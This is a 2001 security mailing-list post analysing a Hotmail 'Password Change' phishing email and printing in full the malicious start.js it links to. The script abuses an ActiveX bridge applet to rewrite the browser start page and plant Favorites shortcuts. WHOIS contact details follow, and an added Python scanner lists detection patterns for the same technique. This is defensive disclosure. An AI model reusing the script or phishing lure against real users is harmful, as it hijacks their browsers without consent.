Vulnerability Development mailing list archives

Hotmail message malware


From: quentyn () fotango com
Date: Fri, 10 Aug 2001 14:09:24 +0100

there appears to be a new hotmail malware thingy it is sent from
admin02 () hotmail com with the subject line of Password Change


wonder how many people it will get before all the sites are closed?

Detail - 

I just received this mail from 202.104.122.157 [1]

#START

From admin02 () hotmail com Thu, 09 Aug 2001 18:21:54 -0700
Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id
MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28
-0700
Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
From: admin02 () hotmail com
To: ${MYEMAIL}@hotmail.com
Subject: Password Change
Date: Sat, 8 Sep 2001 08:13:32
Mime-Version: 1.0
Content-Type: text/html; charset="DEFAULT_CHARSET"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700

<HTML>

<HEAD>

</HEAD>

<BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B"
 ALINK="#FF0000">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change
Confirmation</B></FONT>
</P>
<P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully
changed. Please remember your new Password. </B></FONT></P>
<P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this
please click here to restore your old password.</A></FONT> </P>
</BODY>
</HTML>

#END


now going to maeveshomepage.com/ty.htm [2] in opera shows

#START

<!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO
5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
 
<HTML>
 
<HEAD>
<TITLE></TITLE>
</HEAD>
 
<BODY BGCOLOR="#336699">
 <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been
restored.</FONT> <SCRIPT SRC="start.js">
</SCRIPT>
</P>
</BODY>
</HTML>

#END

and looking at start.js (the interesting bit)

#START

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
function AddFavLnk(loc, DispName, SiteURL)
{
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName + ".URL");
  Shor.TargetPath = SiteURL;
  Shor.Save();
}
function f(){
  try
  {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Shell
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); // Scripting.FileSystemObject
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Network
    a1.createInstance();
    Net = a1.GetObject();
    try{
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      // Home page
      Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      var WF, Shor, loc;
      WF = FSO.GetSpecialFolder(0);
      loc = WF + "\\Favorites";
      if(!FSO.FolderExists(loc))
      {
        loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
        if(!FSO.FolderExists(loc))
        {
          return;
        }
      }
      // Favorites
      AddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com");
      AddFavLnk(loc, " Aol", "http://www.aol.com");
    }
    catch(e){ }
  }
  catch(e){ }
}
function init(){
  setTimeout("f()", 1000);
}
init();

#END

it appears to set your default home page to http://yahhooo.devil.ru/ [3]
and get your favorites (which may contain saved usernames and passwords)

anybody got anything further?

Q

Notes

[1] - inetnum:     202.104.122.128 - 202.104.122.159
    netname:     SHENZHEN-JLXXCY-INFOR-LTD
    descr:       SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
    country:     CN
    admin-c:     HB58-AP
    tech-c:      HB58-AP
    mnt-by:      MAINT-CHINANET-GD
    changed:     ipadm () gddc com cn 20000920
    source:      APNIC

    person:      HU BOG
    address:     F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
    country:     CN
    phone:       +86-755-3521135
    fax-no:      +86-755-3396971
    e-mail:      ipuser () gddc com cn
    nic-hdl:     HB58-AP
    mnt-by:      MAINT-CHINANET-GD
    changed:     ipadm () gddc com cn 20000920
    source:      APNIC


[2] - Registrant:
     JBO
     223 S. 5th
     usa, O ---
     US    

     Domain Name: MAEVESHOMEPAGE.COM
     
     Administrative Contact:
        I, TJ  bwestby () midwest net
        223 S. 5th
        usa, O ---
        US    
        1115551212

     Technical Contact:
        I, TJ  bwestby () midwest net
        223 S. 5th
        usa, O ---
        US    
        1115551212

     Billing Contact:
        I, TJ  bwestby () midwest net
        223 S. 5th
        usa, O ---
        US    
        1115551212


     Record last updated on 11-Jul-2001.
     Record expires on 07-May-2002.
     Record Created on 07-May-2001.

     Domain servers in listed order:
        NS1.VEGASSECURE.NET   208.50.15.6
        NS2.VEGASSECURE.NET   208.50.15.7

[3] - domain:  DEVIL.RU
    type:    CORPORATE
    admin-o: AK2000-RIPN
    nserver: ns.kravchenko.ru. 
    nserver: srvr.list.ru. 
    created: 07-AUG-2000
    state:   Delegated
    changed: 19-MAY-2001
    mnt-by:  ANDRIUSHA-MNT-RIPN
    source:  RIPN


    person:  Andrey S Kravchenko
    nic-hdl: AK2000-RIPN
    address: Teatralny st 23a/30,
    address: Donetsk, Ukraine, 340100
    phone:   +7 902 6010000
    fax-no:  +7 902 6010000
    e-mail:  andrey () kravchenko ru
    changed: 18-AUG-2000
    mnt-by:  ANDRIUSHA-MNT-RIPN
    source:  RIPN


-- 
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
You're damn right we need a rational code of morality and ethics. But
not much progress can
be made in that direction while we've still got a majority ranting about
gods, devils, souls, and
absolute morality, and using an ancient book written by ignorant nomads
as a guide.
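Added example (not part of the original post): a small static scanner for the pattern the start.js above uses, namely an MSJVM ActiveXComponent applet bridging to WScript.Shell, Scripting.FileSystemObject and WScript.Network by CLSID, a RegWrite to the IE Start Page key, and dropping .URL shortcuts. The CLSID-to-ProgID mapping is public registry knowledge; the sample script and rule names are constructed for this example.

```python
import re

# Public CLSID -> ProgID identities of the three objects the script instantiates.
KNOWN_CLSIDS = {
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
    "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Network",
}

# Detection rules (names are constructed for this example).
RULES = [
    ("activex_bridge_applet",
     re.compile(r"<APPLET[^>]*code=com\.ms\.activeX\.ActiveXComponent", re.I)),
    ("ie_startpage_regwrite",
     re.compile(r"RegWrite\s*\(\s*\"HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer"
                r"\\\\Main\\\\Start\s*Page\"", re.I)),
    ("favorites_shortcut_drop",
     re.compile(r"CreateShortcut\s*\(.*\.URL\"", re.I)),
]

CLSID_RE = re.compile(r"setCLSID\s*\(\s*\"\{([0-9A-F-]{36})\}\"", re.I)


def scan_script(js: str) -> dict:
    """Return rule hits, the CLSIDs requested via setCLSID, and a verdict."""
    hits = [name for name, rx in RULES if rx.search(js)]
    clsids = {c.upper(): KNOWN_CLSIDS.get(c.upper(), "unknown")
              for c in CLSID_RE.findall(js)}
    known = [v for v in clsids.values() if v != "unknown"]
    if "activex_bridge_applet" in hits and known:
        verdict = "malicious"      # browser script reaching scripting-host objects
    elif hits or clsids:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "clsids": clsids, "verdict": verdict}


# Constructed, condensed sample mirroring the structure of the posted start.js.
SAMPLE_JS = r'''
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject();
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid/");
var Shor = Shl.CreateShortcut(loc + "\\" + DispName + ".URL");
'''

if __name__ == "__main__":
    print(scan_script(SAMPLE_JS))
```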

